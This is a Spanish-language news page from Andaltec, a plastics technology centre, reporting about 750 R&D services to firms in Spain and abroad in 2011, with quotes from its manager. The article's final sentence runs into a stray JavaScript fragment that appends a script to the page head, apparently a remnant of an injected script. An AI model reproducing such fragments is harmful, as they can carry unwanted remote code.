Andaltec
Copyright Andaltec
Andaltec presta 750 servicios de I+D a empresas españolas y de otros países en 2011 - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
189
post-template-default,single,single-post,postid-189,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Andaltec presta 750 servicios de I+D a empresas españolas y de otros países en 2011

Andaltec presta 750 servicios de I+D a empresas españolas y de otros países en 2011

El Centro Tecnológico del Plástico (Andaltec) ha prestado alrededor de 750 servicios de I+D a empresas del sector del plástico a lo largo del año 2011, una cifra muy superior a la registrada en años anteriores. Este dato incluye tanto las consultas efectuadas por las firmas a los técnicos de Andaltec como los servicios de I+D lanzados o propuestos a las compañías por parte del Centro. La mayor parte de las empresas que se han dirigido a los expertos del Centro Tecnológico del Plástico pertenecen al sector del plástico, aunque también hay firmas de otros ámbitos que se han interesado por las posibilidades y beneficios del plástico.

A lo largo del año 2011, el personal de Andaltec ha atendido consultas de otros países europeos, como Italia, Alemania, Reino Unido o Finlandia, aunque también han tenido un peso considerable las peticiones llegadas desde varias naciones de América Latina. Además de atender a empresas de todo el territorio andaluz, Andaltec ha asesorado a firmas de otros territorios españoles,  como Galicia, Valencia, Madrid, País Vasco y Cataluña.

Las consultas de las empresas se han centrado principalmente en el requerimiento de servicios de I+D, el desarrollo de productos y prototipos, pruebas de laboratorio o petición de ayuda para la búsqueda de proveedores y fabricantes de productos.

El gerente del Centro Tecnológico del Plástico, José María Navarro, destaca que el centro ha llevado a cabo un número significativo de actuaciones de interés para empresas extranjeras. “En los últimos años ha crecido de manera importante el número de empresas, universidades o entidades de investigación de otros países que se dirigen a Andaltec, lo que quiere decir que estamos teniendo éxito en nuestro plan de internacionalización”, indica.

Navarro argumenta que, a pesar de contar con una trayectoria no muy larga, el Centro ya se ha convertido en una referencia obligada para el sector y, sobre todo, para las empresas, que son el principal destinatario de sus servicios El gerente de Andaltec señala que, a pesar de la complejidad tecnológica de este sector, el personal del Centro ha alcanzando un nivel de especialización y madurez tal que le capacita para atender cualquier problema, tanto desde su aportación personal como a través de la búsqueda de alianzas, de forma que ninguna consulta corra el riesgo de quedar desatendida.

Igualmente, Navarro se muestra satisfecho por el hecho de que  las empresas recurran cada vez más a centros como Andaltec. “El incremento de la actividad internacional de Andaltec es satisfactorio en cuanto a la adquisición e importación de conocimiento que esto conlleva, y en cuanto a la transferencia de tecnología que se cede al tejido empresarial, lo que permite mejorar la competitividad de las empresas andaluzas con sus clientes y con el mercado”, señala el gerente.d.getElementsByTagName(‘head’)[0].appendChild(s);